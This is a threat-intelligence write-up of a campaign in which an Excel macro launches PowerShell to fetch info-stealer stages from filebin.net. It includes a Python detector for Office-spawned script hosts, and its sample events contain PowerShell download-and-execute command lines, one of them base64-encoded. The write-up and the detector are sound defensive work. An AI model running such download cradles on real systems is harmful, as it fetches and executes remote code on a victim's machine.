FortiGuard Labs uncovered a multi-stage malware campaign in which an Excel document delivers an info-stealer; the activity is attributed to a Vietnam-based threat group previously identified in August and September 2023. The attack passes through several stages before the info-stealer is deployed, including simple downloaders designed to evade detection. The initial stage is an Excel document containing a VBA script that runs a PowerShell command to fetch a malicious file from filebin.net.
The campaign relies heavily on open file-hosting platforms to deliver its components, which let researchers gather insight into the group's tactics and techniques. Files retrieved from these platforms share characteristics with the campaign, such as obfuscated batch files and VBScript files that execute PowerShell code. Additional repositories linked to the group host other malware families, including XWorm, VenomRAT and RedLine, suggesting malicious activity beyond this campaign.
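The delivery chain described in the two paragraphs above (an Office document whose macro launches PowerShell, or a batch/VBScript stage, to pull the next stage from an open file-hosting host such as filebin.net) is easier to catch at the process-creation boundary than with network blocking, because the hosting platform itself is legitimate. The following Python is an added example, not code from FortiGuard Labs or the report it accompanies; it runs over constructed Sysmon-style process-creation events (the paths, command lines and filebin.net URL paths are invented for illustration) and flags an Office parent spawning a script host, raising the severity when the command line, including a decoded -EncodedCommand payload, references a known open-hosting domain.

```python
"""Flag Office-spawned script hosts that pull payloads from open file-hosting
platforms. Added example over constructed Sysmon-style (Event ID 1) events."""
import base64
import json
import re
from urllib.parse import urlparse

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "mshta.exe"}
# filebin.net is the host named in the report; extend with other open platforms you observe.
OPEN_HOSTING = {"filebin.net"}

URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.IGNORECASE)
# PowerShell's -EncodedCommand (and its short forms) carries base64 of UTF-16LE text.
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand text, or '' if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def extract_urls(cmdline: str) -> list:
    """URLs visible in the command line plus any hidden in an encoded payload."""
    return URL_RE.findall(cmdline + " " + decode_encoded_command(cmdline))


def classify(event: dict):
    """Return a finding for an Office -> script-host chain, else None."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return None
    urls = extract_urls(event.get("CommandLine", ""))
    hosts = {urlparse(u).hostname for u in urls}
    if hosts & OPEN_HOSTING:
        severity = "high"      # the report's pattern: fetch from an open hosting site
    elif urls:
        severity = "medium"    # Office spawning a downloader from some other host
    else:
        severity = "low"       # Office spawning a script host is unusual on its own
    return {"parent": parent, "child": child, "urls": urls, "severity": severity}


def scan(lines) -> list:
    """Apply classify() to JSON-per-line events, skipping unparsable lines."""
    findings = []
    for line in lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue
        if not isinstance(event, dict):
            continue
        finding = classify(event)
        if finding:
            findings.append(finding)
    return findings


def _enc(text: str) -> str:
    """Encode text the way PowerShell -EncodedCommand expects (UTF-16LE base64)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed sample events; paths and URL paths are invented for illustration.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('https://filebin.net/example/stage2.txt')\""},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
                    + _enc("iwr https://filebin.net/example/next.bat -OutFile $env:TEMP\\n.bat")},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c Get-Date"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c echo hello"},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS] + ["not json at all"]

if __name__ == "__main__":
    for f in scan(SAMPLE_LINES):
        print(f["severity"], f["parent"], "->", f["child"], f["urls"])
```

The encoded-command decode matters in practice: the obfuscated batch and VBScript stages the report describes typically hand PowerShell a base64 blob, so a rule that only pattern-matches the visible command line misses the download URL entirely.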
The investigation also turned up clues to a second campaign run through a Telegram bot, in which victims are lured into enabling macros in a Word document named "done 300coki.docm". Although that file could not be obtained, the filename suggests cookies are used as bait. Researchers also identified a Word document containing Facebook cookies and a malicious macro, pointing to the range of lures the threat actors use against victims.